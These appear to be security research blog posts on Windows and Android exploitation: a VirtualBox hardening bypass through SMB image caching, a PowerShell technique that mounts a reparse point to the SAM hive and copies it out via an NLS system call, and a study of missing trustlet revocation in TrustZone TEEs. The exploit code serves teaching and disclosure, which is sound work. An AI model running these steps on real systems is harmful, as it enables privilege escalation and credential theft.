Trying to desynchronize the file data from the SectionObjectPointer seems to be pretty tricky on an NTFS volume, at least without administrator privileges. One scenario where you can do this desynchronization is via the SMB redirector when accessing network shares. The reason is pretty simple: it’s the local redirector’s responsibility to allocate the SectionObjectPointer structure when a file is opened on a remote server. As far as the redirector’s concerned, if it opens the file \Share\File.dll on a server twice then it’s the same file. There’s no other information the redirector can really use to verify the identity of the file; it has to guess. Any property you can think of, Object ID, Modification Time, can just be a lie. You could easily modify a copy of SAMBA to do this lying for you. The redirector also can’t lock the file and ensure it stays locked. So it seems the redirector just doesn’t bother with any of it; if it looks like the same file from its perspective it assumes it’s fine.
However, this is only for the SectionObjectPointer; if the caller wants to read the contents of the file, the SMB redirector will go out to the server and try to read the current state of the file. Again this could all be lies, and the server could return any data it likes. This is how we can create a desynchronization: if we map an image file from an SMB server, change the underlying file data, then reopen the file and map the image again, the mapped image will be the cached one, but any data read from the file will be what’s current on the server. This way we can map an untrusted DLL first, then replace the file data with a signed, valid file (SMB supports reading the owner of the file, so we can spoof TrustedInstaller); when VBOX tries to load it, it will verify the signed file but map the cached untrusted image, and it will never know.
Having a remote server isn’t ideal; however, we can do everything we need by using the local loopback SMB server and accessing files via the admin shares. Contrary to their name, admin shares are not limited to administrators if you’re coming from localhost. The key to getting this to work is to use a Directory Junction. Junctions are resolved on the server; the redirector client knows nothing about them. Therefore, as far as the client is concerned, if it opens the file \\localhost\c$\Dir\File.dll once, then reopens the same file, these could be two completely different files, as shown in the following diagram:

Fortunately, one thing which should be evident from the previous two issues is that VBOX’s hardening code doesn’t really care where the DLL is located as long as it meets its two criteria: it’s owned by TrustedInstaller and it’s signed. We can point the COM hijack to an SMB share on the local system. Therefore we can perform the attack as follows:
  1. Set up a junction on the C: drive pointing at a directory containing our untrusted file.
  2. Map the file via the junction over the c$ admin share using LoadLibrary, do not release the mapping until the exploit is complete.
  3. Change the junction to point to another directory with a valid, signed file with the same name as our untrusted file.
  4. Start VBOX with the COM hijack pointing at the file. VBOX will read the file and verify it’s signed and owned by TrustedInstaller, however when it maps it the cached, untrusted image section will be used instead.
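
A rough sketch of those steps (all paths are placeholders, and the junction manipulation is delegated to mklink for brevity, where a real PoC would set the reparse point directly):
#include <windows.h>
#include <cstdlib>

int main() {
 // 1. Junction pointing at the directory with the untrusted ABC.dll.
 system("mklink /J c:\\share c:\\payload_dir");
 // 2. Map the untrusted image via the admin share; the redirector
 // caches the image section. Keep the module loaded.
 HMODULE mod = LoadLibraryW(L"\\\\localhost\\c$\\share\\ABC.dll");
 // 3. Repoint the junction at a directory holding a signed ABC.dll.
 system("rmdir c:\\share && mklink /J c:\\share c:\\signed_dir");
 // 4. Start VBOX with the COM hijack pointing at
 // \\localhost\c$\share\ABC.dll: verification reads the signed file,
 // but mapping reuses the cached untrusted image section.
 return mod != nullptr ? 0 : 1;
}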

So how did Oracle fix this? They now check that the mapped file isn’t on a network share by comparing the path against the prefix \Device\Mup.

Conclusions
The implementation of process hardening in VirtualBox is complex and because of that it is quite error prone. I’m sure there are other ways of bypassing the protection, it just requires people to go looking. Of course none of this would be necessary if they didn’t need to protect access to the VirtualBox kernel driver from malicious use, but that’s a design decision that’s probably going to be difficult to fix in the short term.

Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read

Tue, 08/08/2017 - 12:17
Posted by James Forshaw, Project Zero
For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2-hour slot fails to do the topic justice, and some interesting tips and tricks I’d like to present have to be cut. So, as the likelihood of a full training course any time soon is pretty low, I thought I’d put together an irregular series of blog posts detailing small, self-contained exploitation tricks which you can put to use if you find similar security vulnerabilities in Windows.
In this post I’m going to give a technique to go from an arbitrary directory creation vulnerability to arbitrary file read. Arbitrary directory creation vulnerabilities do exist - for example, here’s one that was in the Linux subsystem - but it’s not always obvious how you’d exploit such a bug, in contrast to arbitrary file creation where a DLL is dropped somewhere. You could abuse DLL Redirection support, where you create a directory called program.exe.local to do DLL planting, but that’s not always reliable as you’ll only be able to redirect DLLs not in the same directory (such as System32) and only ones which would normally go via Side-by-Side DLL loading.
For this blog we’ll use my example driver from the Workshop, which already contains a vulnerable directory creation bug, and we’ll write a Powershell script to exploit it using my NtObjectManager module. The technique I’m going to describe isn’t a vulnerability, but it’s something you can use if you have a separate directory creation bug.

Quick Background on the Vulnerability Class

When dealing with files from the Win32 API you’ve got two functions, CreateFile and CreateDirectory. It would make sense that there’s a separation between the two operations. However at the Native API level there’s only ZwCreateFile; the way the kernel separates files and directories is by passing either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE to the CreateOptions parameter when calling ZwCreateFile. Why the system call is for creating a file and yet the flags are named as if directories are the main file type, I’ve no idea.
A very simple vulnerable example you might see in a kernel driver looks like the following:
NTSTATUS KernelCreateDirectory(PHANDLE Handle,
                               PUNICODE_STRING Path) {
 IO_STATUS_BLOCK io_status = { 0 };
 OBJECT_ATTRIBUTES obj_attr = { 0 };

 InitializeObjectAttributes(&obj_attr, Path,
    OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
    NULL, NULL);

 return ZwCreateFile(Handle, MAXIMUM_ALLOWED,
                     &obj_attr, &io_status,
                     NULL, FILE_ATTRIBUTE_NORMAL,
                     FILE_SHARE_READ | FILE_SHARE_DELETE,
                     FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
}
There are three important things to note about this code that determine whether it’s an exploitable directory creation vulnerability. First, it’s passing FILE_DIRECTORY_FILE to CreateOptions, which means it’s going to create a directory. Second, it’s passing FILE_OPEN_IF as the Disposition parameter, which means the directory will be created if it doesn’t exist, or opened if it does. And third, and perhaps most importantly, the driver is calling a Zw function, which means that the call to create the directory will default to running with kernel permissions, which disables all access checks. The way to guard against this would be to pass the OBJ_FORCE_ACCESS_CHECK attribute flag in the OBJECT_ATTRIBUTES; however, we can see from the flags passed to InitializeObjectAttributes that the flag is not being set in this case.
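For contrast, here’s a sketch of the hardened variant of the same function (my illustration); forcing the access check is the key difference:
// Adding OBJ_FORCE_ACCESS_CHECK makes ZwCreateFile honor the caller's
// access rights even though the call runs with kernel permissions.
NTSTATUS KernelCreateDirectorySafe(PHANDLE Handle,
                                   PUNICODE_STRING Path) {
 IO_STATUS_BLOCK io_status = { 0 };
 OBJECT_ATTRIBUTES obj_attr = { 0 };

 InitializeObjectAttributes(&obj_attr, Path,
    OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE | OBJ_FORCE_ACCESS_CHECK,
    NULL, NULL);

 return ZwCreateFile(Handle, MAXIMUM_ALLOWED,
                     &obj_attr, &io_status,
                     NULL, FILE_ATTRIBUTE_NORMAL,
                     FILE_SHARE_READ | FILE_SHARE_DELETE,
                     FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
}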
Just from the vulnerable snippet we don’t know where the destination path is coming from; it could be from the user or it could be fixed. As long as this code is running in the context of the current process (or is impersonating your user account) it doesn’t really matter. Why is running in the current user’s context so important? It ensures that when the directory is created the owner of that resource is the current user, which means you can modify the Security Descriptor to give yourself full access to the directory. In many cases even this isn’t necessary, as many of the system directories have a CREATOR OWNER access control entry which ensures that the owner gets full access immediately.

Creating an Arbitrary Directory

If you want to follow along you’ll need to set up a Windows 10 VM (it doesn’t matter if it’s 32 or 64 bit) and follow the details in setup.txt from the zip file containing my Workshop driver. Then you’ll need to install the NtObjectManager Powershell Module. It’s available on the Powershell Gallery, an online module repository, so follow the details there.

Assuming that’s all done, let’s get to work. First let’s look at how we can call the vulnerable code in the driver. The driver exposes a Device Object to the user with the name \Device\WorkshopDriver (we can see the setup in the source code). All “vulnerabilities” are then exercised by sending Device IO Control requests to the device object. The code for the IO Control handling is in device_control.c and we’re specifically interested in the dispatch. The code ControlCreateDir is the one we’re looking for; it takes the input data from the user and uses that as an unchecked UNICODE_STRING to pass to the code to create the directory. If we look up the code to create the IOCTL number we find ControlCreateDir is 2, so let’s use the following PS code to create an arbitrary directory.
Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl {
   Param([int]$ControlCode)
   [NtApiDotNet.NtIoControlCode]::new("Unknown",`
       0x800 -bor $ControlCode, "Buffered", "Any")
}

function New-Directory {
 Param([string]$Filename)
 # Open the device driver.
 Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
   # Get IOCTL for ControlCreateDir (2)
   $ioctl = Get-DriverIoCtl -ControlCode 2
   # Convert DOS filename to NT
   $nt_filename = [NtApiDotNet.NtFileUtils]::DosFileNameToNt($Filename)
   $bytes = [Text.Encoding]::Unicode.GetBytes($nt_filename)
   $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
 }
}
The New-Directory function first opens the device object, converts the path to a native NT format as an array of bytes and calls DeviceIoControl on the device. We could just pass an integer value for the control code, but the NT API libraries I wrote have an NtIoControlCode type to pack up the values for you. Let’s try it and see if it works to create the directory c:\windows\abc.

It works and we’ve successfully created the arbitrary directory. Just to check, we use Get-Acl to get the Security Descriptor of the directory and we can see that the owner is the ‘user’ account, which means we can get full access to the directory.

Now the problem is what to do with this ability? There’s no doubt some system service which might look up in a list of directories for an executable to run or a configuration file to parse. But it’d be nice not to rely on something like that. As the title suggested, instead we’ll convert this into an arbitrary file read. How might we go about doing that?

Mount Point Abuse

If you’ve watched my talk on Abusing Windows Symbolic Links you’ll know how NTFS mount points (or sometimes Junctions) work. The $REPARSE_POINT NTFS attribute is stored with the directory, which the NTFS driver reads when opening it. The attribute contains an alternative native NT object manager path to the destination of the symbolic link, which is passed back to the IO manager to continue processing. This allows the mount point to work between different volumes, but it does have one interesting consequence: the path doesn’t actually have to point to another directory. What if we give it a path to a file?
If you use the Win32 APIs it will fail, and if you use the NT APIs directly you’ll find you end up in a weird paradox. If you try to open the mount point as a file the error will say it’s a directory, and if you instead try to open it as a directory it will tell you it’s really a file. It turns out that if you don’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE then the NTFS driver will pass its checks and the mount point can actually redirect to a file.
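A sketch of such an open from user mode (the NT path is illustrative; NtOpenFile and friends come from winternl.h, linking against ntdll.lib):
#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

// Open an NT path with OpenOptions == 0: neither FILE_DIRECTORY_FILE
// nor FILE_NON_DIRECTORY_FILE, so a mount point redirecting to a file
// opens without error.
HANDLE OpenViaMountPoint(const wchar_t* nt_path) {
 UNICODE_STRING name;
 RtlInitUnicodeString(&name, nt_path);
 OBJECT_ATTRIBUTES obj_attr;
 InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE,
                            nullptr, nullptr);
 IO_STATUS_BLOCK io_status = {};
 HANDLE handle = nullptr;
 NTSTATUS status = NtOpenFile(&handle, GENERIC_READ | SYNCHRONIZE, &obj_attr,
                              &io_status, FILE_SHARE_READ, 0);
 return status >= 0 ? handle : nullptr;  // Non-negative NTSTATUS == success.
}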
Perhaps we can find some system service which will open our file without any of these flags (if you pass FILE_FLAG_BACKUP_SEMANTICS to CreateFile this will also remove both flags) and ideally get the service to read and return the file data.

National Language Support

Windows supports many different languages, and in order to support non-Unicode encodings still supports Code Pages. A lot of this is exposed through the National Language Support (NLS) libraries, and you’d assume that the libraries run entirely in user mode, but if you look at the kernel you’ll find a few system calls here and there to support NLS. The one of most interest to this blog is the NtGetNlsSectionPtr system call. This system call maps code page files from the System32 directory into a process’ memory where the libraries can access the code page data. It’s not entirely clear why it needs to be in kernel mode; perhaps it’s just to make the sections shareable between all processes on the same machine. Let’s look at a simplified version of the code; it’s not a very big function:
NTSTATUS NtGetNlsSectionPtr(DWORD NlsType, DWORD CodePage,
                            PVOID *SectionPointer, PULONG SectionSize) {
 UNICODE_STRING section_name;
 OBJECT_ATTRIBUTES section_obj_attr;
 HANDLE section_handle;
 RtlpInitNlsSectionName(NlsType, CodePage, &section_name);
 InitializeObjectAttributes(&section_obj_attr, &section_name,
                            OBJ_KERNEL_HANDLE | OBJ_OPENIF |
                            OBJ_CASE_INSENSITIVE | OBJ_PERMANENT);

 // Open section under \NLS directory.
 if (!NT_SUCCESS(ZwOpenSection(&section_handle, SECTION_MAP_READ,
                               &section_obj_attr))) {
   // If no section then open the corresponding file and create section.
   UNICODE_STRING file_name;
   OBJECT_ATTRIBUTES obj_attr;
   HANDLE file_handle;
   RtlpInitNlsFileName(NlsType, CodePage, &file_name);
   InitializeObjectAttributes(&obj_attr, &file_name,
                              OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE);
   ZwOpenFile(&file_handle, SYNCHRONIZE, &obj_attr, FILE_SHARE_READ, 0);
   ZwCreateSection(&section_handle, FILE_MAP_READ, &section_obj_attr,
                   NULL, PROTECT_READ_ONLY, MEM_COMMIT, file_handle);
   ZwClose(file_handle);
 }

 // Map section into memory and return pointer.
 NTSTATUS status = MmMapViewOfSection(section_handle, SectionPointer,
                                      SectionSize);
 ZwClose(section_handle);
 return status;
}
The first thing to note here is it tries to open a named section object under the \NLS directory using a name generated from the CodePage parameter. To get an idea what that name looks like we’ll just list that directory:

The named sections are of the form NlsSectionCP<NUM>, where NUM is the number of the code page to map. You’ll also notice there’s a section for a normalization data set. Which file gets mapped depends on the first NlsType parameter; we don’t care about normalization for the moment. If the section object isn’t found, the code builds a file path to the code page file, opens it with ZwOpenFile and then calls ZwCreateSection to create a read-only named section object. Finally, the section is mapped into memory and returned to the caller.
There are two important things to note here. First, the OBJ_FORCE_ACCESS_CHECK flag is not being set for the open call. This means the call will open any file even if the caller doesn’t have access to it. And most importantly, the final parameter of ZwOpenFile is 0, which means neither FILE_DIRECTORY_FILE nor FILE_NON_DIRECTORY_FILE is being set. Not setting these flags will result in our desired condition: the open call will follow the mount point redirection to a file and not generate an error. What is the file path set to? We can just disassemble RtlpInitNlsFileName to find out:
void RtlpInitNlsFileName(DWORD NlsType, DWORD CodePage,
                         PUNICODE_STRING String) {
 if (NlsType == NLS_CODEPAGE) {
   RtlStringCchPrintfW(String,
            L"\\SystemRoot\\System32\\c_%.3d.nls", CodePage);
 } else {
   // Get normalization path from registry.
   // NOTE about how this is arbitrary registry write to file.
 }
}
The file is of the form c_<NUM>.nls under the System32 directory. Note that it uses the special symbolic link \SystemRoot, which points to the Windows directory using a device path format. This prevents this code from being abused by redirecting drive letters (which would have made it an actual vulnerability). Also note that if the normalization path is requested the information is read from a machine registry key, so if you have an arbitrary registry value writing vulnerability you might be able to exploit this system call to get another arbitrary read; but that’s for the interested reader to investigate.
I think it’s clear now what we have to do: create a directory in System32 with the name c_<NUM>.nls, set its reparse data to point to an arbitrary file, then use the NLS system call to open and map the file. Choosing a code page number is easy: 1337 is unused. But what file should we read? A common choice is the SAM registry hive, which contains logon information for local users. However, access to the SAM file is usually blocked as it’s not shareable, and even just opening it for read access as an administrator will fail with a sharing violation. There are of course a number of ways you can get around this; you can use the registry backup functions (but that needs admin rights) or we can pull an old copy of the SAM from a Volume Shadow Copy (which isn’t on by default on Windows 10). So perhaps let’s forget about… no wait, we’re in luck.
File sharing on Windows depends on the access being requested. For example, if the caller requests Read access but the file is not shared for read access then it fails. However, it’s possible to open a file for certain non-content rights, such as reading the security descriptor or synchronizing on the file object, rights which are not considered when checking the existing file sharing settings. If you look back at the code for NtGetNlsSectionPtr you’ll notice the only access right being requested for the file is SYNCHRONIZE, and so the open will always be allowed even if the file is locked with no sharing access.
But how can that work? Doesn’t ZwCreateSection need a readable file handle to do the read-only file mapping? Yes and no. Windows file objects do not really care whether a file is readable or writable; access rights are associated with the handle created when the file is opened. When you call ZwCreateSection from user mode, the call eventually tries to convert the handle to a pointer to the file object. For that to occur the caller must specify what access rights need to be on the handle for it to succeed; for a read-only mapping the kernel requires the handle to have Read Data access. However, just as with file access checking, if the kernel calls ZwCreateSection, access checking is disabled, including when converting a file handle to the file object pointer. This results in ZwCreateSection succeeding even though the file handle only has SYNCHRONIZE access, which means we can open any file on the system regardless of its sharing mode, and that includes the SAM file.
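A user-mode sketch of a SYNCHRONIZE-only open (illustrative; note that for the SAM specifically the file’s DACL would still block a normal user here, which is exactly why the kernel’s access-check-free ZwOpenFile matters):
#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

// Request only SYNCHRONIZE: non-content rights aren't subject to the
// existing sharing mode, so the open succeeds even on a locked file.
HANDLE OpenForSynchronizeOnly(const wchar_t* nt_path) {
 UNICODE_STRING name;
 RtlInitUnicodeString(&name, nt_path);
 OBJECT_ATTRIBUTES obj_attr;
 InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE,
                            nullptr, nullptr);
 IO_STATUS_BLOCK io_status = {};
 HANDLE handle = nullptr;
 NTSTATUS status = NtOpenFile(&handle, SYNCHRONIZE, &obj_attr, &io_status,
                              FILE_SHARE_READ, 0);
 return status >= 0 ? handle : nullptr;
}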
So let’s put the final touches to this. We create the directory \SystemRoot\System32\c_1337.nls and convert it to a mount point which redirects to \SystemRoot\System32\config\SAM. Then we call NtGetNlsSectionPtr requesting code page 1337, which creates the section and returns us a pointer to it. Finally, we just copy the mapped file memory into a new file and we’re done.
$dir = "\SystemRoot\system32\c_1337.nls"
New-Directory $dir
 
$target_path = "\SystemRoot\system32\config\SAM"
Use-NtObject($file = Get-NtFile $dir `
             -Options OpenReparsePoint,DirectoryFile) {
 $file.SetMountPoint($target_path, $target_path)
}

Use-NtObject($map = [NtApiDotNet.NtLocale]::GetNlsSectionPtr("CodePage", 1337)) {
 Use-NtObject($output = [IO.File]::OpenWrite("sam.bin")) {
   $map.GetStream().CopyTo($output)
   Write-Host "Copied file"
 }
}
Loading the created file in a hex editor shows we did indeed steal the SAM file.

For completeness we’ll clean up our mess. We can just delete the directory by opening it with the Delete On Close flag and then closing the handle (making sure to open it as a reparse point, otherwise you’ll try to open the SAM again). For the section, as the object was created in our security context (just like the directory) and there was no explicit security descriptor, we can open it for DELETE access and call ZwMakeTemporaryObject to remove the permanent reference count set by the original creator with the OBJ_PERMANENT flag.
Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                   -Access Delete) {
 # Delete permanent object.
 $sect.MakeTemporary()
}

Wrap-Up

What I’ve described in this blog post is not a vulnerability, although certainly the code doesn’t seem to follow best practice. It’s a system call which hasn’t changed since at least Windows 7, so if you find yourself with an arbitrary directory creation vulnerability you should be able to use this trick to read any file on the system regardless of whether it’s already open or shared. I’ve put the final script on GitHub at this link if you want the final version to get a better understanding of how it works.
It’s worth keeping a log of any unusual behaviours you come across when reverse engineering a product, in case they become useful, as happened in this case. Many times I’ve found code which isn’t itself a vulnerability but has some useful properties which allow you to build out exploitation chains.

Trust Issues: Exploiting TrustZone TEEs

Mon, 07/24/2017 - 12:39
Posted by Gal Beniamini, Project Zero
Mobile devices are becoming an increasingly privacy-sensitive platform. Nowadays, devices process a wide range of personal and private information of a sensitive nature, such as biometric identifiers, payment data and cryptographic keys. Additionally, modern content protection schemes demand a high degree of confidentiality, requiring stricter guarantees than those offered by the “regular” operating system.
In response to these use-cases and more, mobile device manufacturers have opted for the creation of a “Trusted Execution Environment” (TEE), which can be used to safeguard the information processed within it. In the Android ecosystem, two major TEE implementations exist - Qualcomm’s QSEE and Trustonic’s Kinibi (formerly <t-base). Both of these implementations rely on ARM TrustZone security extensions in order to facilitate a small “secure” operating system, within which “Trusted Applications” (TAs) may be executed.
In this blog post we’ll explore the security properties of the two major TEEs present on Android devices. We’ll see how, despite their highly sensitive vantage point, these operating systems currently lag behind modern operating systems in terms of security mitigations and practices. Additionally, we’ll discover and exploit a major design issue which affects the security of most devices utilising both platforms. Lastly, we’ll see why the integrity of TEEs is crucial to the overall security of the device, making a case for the need to increase their defences.
Unfortunately, the design issue outlined in this blog post is difficult to address, and at times cannot be fixed without introducing additional dedicated hardware or performing operations that risk rendering devices unusable. As a result, most Qualcomm-based devices and all devices using Trustonic’s Kinibi TEE versions prior to 400 (that is, all Samsung Exynos devices other than the Galaxy S8 and S8 Plus) remain affected by this issue. We hope that by raising awareness of this issue we will help push for more secure designs in the future.
I would like to note that while the current designs being reviewed may be incompatible with some devices’ use-cases, improved designs are being developed as a result of this research which may be accessible to a larger proportion of devices.

TrustZone TEEs
TrustZone forms a hardware-based security architecture which provides security mechanisms both on the main application processor, as well as across the SoC. TrustZone facilitates the creation of two security contexts; the “Secure World” and the “Normal World”. Each physical processor is split into two virtual processors, one for each of the aforementioned contexts.
As its name implies, the “Secure World” must remain protected against any attacks launched by the “Normal World”. To do so, several security policies are enforced by hardware logic that prevents the “Normal World” from accessing the “Secure World”’s resources. What’s more, as the current security state is accessible on the system bus, peripherals on the SoC can be designated to either world by simply sampling this value.
TrustZone’s software model provides each world with its own copies of both lower privilege levels -- EL0 and EL1. This allows for the execution of different operating system kernels simultaneously - one running in the “Secure World” (S-EL1), while another runs in the “Normal World” (EL1). However, the world-split is not entirely symmetrical; for example, the hypervisor extensions (EL2) are not available in the “Secure World”.
[Figure: the TrustZone software model. *TOS: Trusted Operating System]
On Android devices, TrustZone technology is used among other things to implement small “security-conscious” operating systems within which a set of trusted applications (TAs) may be executed. These TrustZone-based TEEs are proprietary components and are provided by the device’s manufacturers.
To put it in context - what we normally refer to as “Android” in our day to day lives is merely the code running in the “Normal World”; the Linux Kernel running at EL1 and the user-mode applications running at EL0. At the same time, the TEE runs in the “Secure World”; the TEE OS runs in the “Secure World”’s EL1 (S-EL1), whereas trusted applications run under S-EL0.
Within the Android ecosystem, two major TEE implementations exist; Qualcomm’s “QSEE” and Trustonic’s “Kinibi”. These operating systems run alongside Android and provide several key features to it. These features include access to biometric sensors, hardware-bound cryptographic operations, a “trusted user-interface” and much more.
Since the “Secure World”’s implementation is closely tied to the hardware of the device and the available security mechanisms on the SoC, the TEE OSs require support from and integration with the earlier parts of the device’s bootchain, as well as low-level components such as the bootloader.
Lastly, as can be seen in the schematic above, in order for the “Normal World” to be able to interact with the TEE and the applications within it, the authors of the TEE must also provide user-libraries, daemons and kernel drivers for the “Normal World”. These components are then utilised by the “Normal World” in order to communicate with the TEE.

Exploring the TEEs
Like any other operating system, the security of a Trusted Execution Environment is hinged upon the integrity of both its trusted applications, and that of the TEE OS’s kernel itself. The interaction with the TEE’s kernel is mostly performed by the trusted applications running under it. As such, the logical first step to assessing the security of the TEEs would be to get a foothold within the TEE itself.
To do so, we’ll need to find a vulnerability in a trusted application and exploit it to gain code execution. While this may sound like a daunting task, remember that trusted applications are merely pieces of software that process user-supplied data. These applications aren’t written in memory safe languages, and are executed within opaque environments - a property which usually doesn’t lend itself well to security.  
Bearing all this in mind, how can we start analysing the trusted applications in either of these platforms? Recall that the implementations are proprietary, so even the file formats used to store the applications may not be public.
Indeed, in Qualcomm’s case the format used to store the applications was not documented until recently. Nonetheless, some attempts have been made to reverse engineer the format resulting in tools that allow converting the proprietary file format into a regular ELF file. Once an ELF file is produced, it can subsequently be analysed using any run-of-the-mill disassembler. What’s more, in a recent positive trend of increased transparency, Qualcomm has released official documentation detailing the file format in its entirety, allowing more robust research tools to be written as a result.
As for Trustonic, the trusted applications’ loadable format is documented within Trustonic’s publicly available header files. This saves us quite some hassle. Additionally, some plugins are available to help load these applications into popular disassemblers such as IDA.

Now that we’ve acquired the tools needed to inspect the trusted applications, we can proceed on to the next step - acquiring the trustlet images (from a firmware image or from the device), converting them to a standard format, and loading them up in a disassembler.
However, before we do so, let’s take a moment to reflect on the trustlet model!

Revisiting the Trustlet Model
To allow for increased flexibility, modern TEEs are designed to be modular, rather than monolithic chunks of code. Each TEE is designed as a “general-purpose” operating system, capable of loading arbitrary trustlets (conforming to some specification) and executing them within a “trusted environment”.  What we refer to as a TEE is the combination of the TEE’s operating system, as well as the applications running within it.
There are many advantages to this model. For starters, changes to a single trustlet only require updating the application’s binary on the filesystem, without necessitating any change in other components of the TEE. This also allows for the creation of a privilege separation model, providing certain privileges to some trustlets while denying them to others. Perhaps most importantly, this enables the TEE OS to enforce isolation between the trustlets themselves, thus limiting the potential damage done by a single malicious (or compromised) trustlet. Of course, while in principle these advantages are substantial, we’ll see later on how they actually map onto the TEEs in question.
Regardless, while the advantages of this model are quite clear, they are not completely free of charge. Recall, as we’ve mentioned above, that trusted applications are not invulnerable. Once vulnerabilities are found in these applications, they can be used to gain code execution within the TEE (in fact, we’ll write such an exploit later on!).
However, this begs the question - “How can trustlets be revoked once they’ve been found to be vulnerable?”. After all, simply fixing a vulnerability in a trustlet would be pointless if an attacker could load old vulnerable trustlets just as easily.
To answer this question, we’ll have to separately explore each TEE implementation.

QSEE Revocation
As we’ve mentioned above, Qualcomm has recently released (excellent) documentation detailing the secure boot sequence on Qualcomm devices, including the mechanisms used for image authentication. As trusted applications running under QSEE are part of the same general architecture described in this document, we may gain key insights into the revocation process by reviewing the document.
Indeed, Qualcomm’s signed images are regular ELF files which are supplemented by a single special “Hash Table Segment”. This segment includes three distinct components: the SHA-256 digest of each ELF segment, a signature blob, and a certificate chain.


The signature is computed over the concatenated blob of SHA-256 hashes, using the private key corresponding to the last certificate in the embedded certificate chain. Moreover, the root certificate in the chain is validated against a “Root Key Hash” which is stored in the device’s ROM or fused into one-time-programmable memory on the SoC.
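To make the verification flow concrete, here is a minimal sketch of the scheme as described in the document. The rsa_verify helper and the raw certificate handling are hypothetical stand-ins, not Qualcomm’s actual implementation:

import hashlib

def verify_image(segments, hash_segment, signature, cert_chain, root_key_hash):
    # Each ELF segment must match its SHA-256 digest in the hash table.
    digests = [hash_segment[i:i + 32] for i in range(0, len(hash_segment), 32)]
    for segment, digest in zip(segments, digests):
        if hashlib.sha256(segment).digest() != digest:
            return False
    # The root certificate must match the hash stored in the device's ROM
    # or fused into one-time-programmable memory on the SoC.
    if hashlib.sha256(cert_chain[-1]).digest() != root_key_hash:
        return False
    # The signature over the concatenated digests must verify against the
    # attestation (leaf) certificate's key. rsa_verify is a placeholder.
    return rsa_verify(cert_chain[0], signature, hash_segment)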
Reading through the document, we quickly come across the following relevant statement:
“The Attestation certificate used to verify the signature on this hash segment also includes additional fields that can bind restrictions to the signature (preventing “rolling back” to older versions of the software image, …”
Ah-ha! Well, let’s keep reading and see if we come across more pertinent information regarding the field in question.
Continuing our review of the document, it appears that Qualcomm has elected to add unique OU fields to the certificates in the embedded chain, denoting several attributes relating to the signature algorithm of the image being loaded. One such field of particular interest to our pursuits is the “SW_ID”. According to the document, this field is used to “bind the signature to a particular version of a particular software image”. Interesting!
The field comprises two concatenated 32-bit values: a version number in the upper half, and an image identifier (IMAGE_ID) in the lower half.
The document then goes on to explain:
“...If eFuse values indicated that the current version was ‘1’, then this image would fail verification. Version enforcement is done in order to prevent loading an older, perhaps vulnerable, version of the image that has a valid signature attached.”
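Putting the two halves together, we can model the 64-bit SW_ID value with a few lines of Python (a sketch assuming, per the layout above, that the version number occupies the upper 32 bits and the image ID the lower 32 bits):

def make_sw_id(version, image_id):
    # Version number in the upper 32 bits, image ID in the lower 32 bits.
    return (version << 32) | image_id

def split_sw_id(sw_id):
    return sw_id >> 32, sw_id & 0xFFFFFFFF

# Widevine on the Pixel: version 0, image ID 0xC -> SW_ID 0x000000000000000C.
assert make_sw_id(0, 0xC) == 0xC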
At this point we have all the information we need. It appears that the subject of image revocation has not eluded Qualcomm -- we’re already off to a good start. However, there are a few more questions in need of an answer yet!
Let’s start by taking a single trustlet, say the Pixel’s Widevine trustlet, and inspecting the value of the SW_ID field encoded in its attestation certificate. As this is a DER-encoded X.509 certificate, we can parse it using “openssl”:

[openssl output showing the certificate’s OU fields, including the SW_ID]
As we can see above, the IMAGE_ID value assigned to the Widevine trustlet is 0xC. But what about the other trustlets in the Pixel’s firmware? Inspecting them reveals a surprising fact -- all trustlets share the same image identifier.
More importantly, however, it appears that the version counter in the Widevine application on the Pixel is 0. Does this mean that no vulnerabilities or other security-relevant issues have been found in that trustlet since the device first shipped? That seems like a bit of a stretch. In order to get a better view of the current state of affairs, we need a little more data.
Luckily, I have a collection of firmware images that can be used for this exact purpose! The collection contains more than 45 different firmware images from many different vendors, including Google, Samsung, LG and Motorola. To collect the needed data, we can simply write a short script to extract the version counter from every trustlet in every firmware image. Running this script on the firmware collection would allow us to assess how many devices have used the trustlet revocation feature in the past to revoke any vulnerable trusted application (since their version counter would have to be larger than zero).
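The script itself can be very simple. The sketch below makes two assumptions which I’ll flag explicitly: that each trustlet’s metadata file carries the “.mdt” extension, and that the SW_ID OU is embedded in the certificate as a printable string of the form “01 <16 hex digits> SW_ID”:

import pathlib
import re
import sys

SW_ID_RE = re.compile(rb'01 ([0-9A-F]{16}) SW_ID')

def trustlet_versions(firmware_root):
    # Walk the firmware dumps and pull the SW_ID OU out of each
    # trustlet metadata file's embedded certificate chain.
    for path in pathlib.Path(firmware_root).rglob('*.mdt'):
        match = SW_ID_RE.search(path.read_bytes())
        if match:
            sw_id = int(match.group(1), 16)
            yield path, sw_id >> 32, sw_id & 0xFFFFFFFF

for path, version, image_id in trustlet_versions(sys.argv[1]):
    print('{}: version={} image_id={:#x}'.format(path, version, image_id))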
After running the script on my firmware collection, we are greeted with a surprising result: with the exception of a single firmware image, all trustlets in all firmware images contain version number 0.
Putting it all together, this would imply one of two things: either no bugs are ever found in any trustlet, or device manufacturers are failing to revoke vulnerable trustlets.
In fact, we already know the answer to this question. Last year I performed research into the Widevine trustlet as present on the Nexus 6 and found (and exploited) a vulnerability allowing arbitrary code execution within the TEE.
This same vulnerability was also present on a wide variety of other devices from different manufacturers, some of which are also a part of my firmware collection. Nonetheless, none of the affected devices in my collection (including the Nexus 6) revoked the vulnerable trustlet, and as such they have remained vulnerable to this issue. While some devices (such as the Nexus 6) have shipped patched versions of the trustlet, simply providing a patched version without incrementing the version counter has no effect whatsoever.
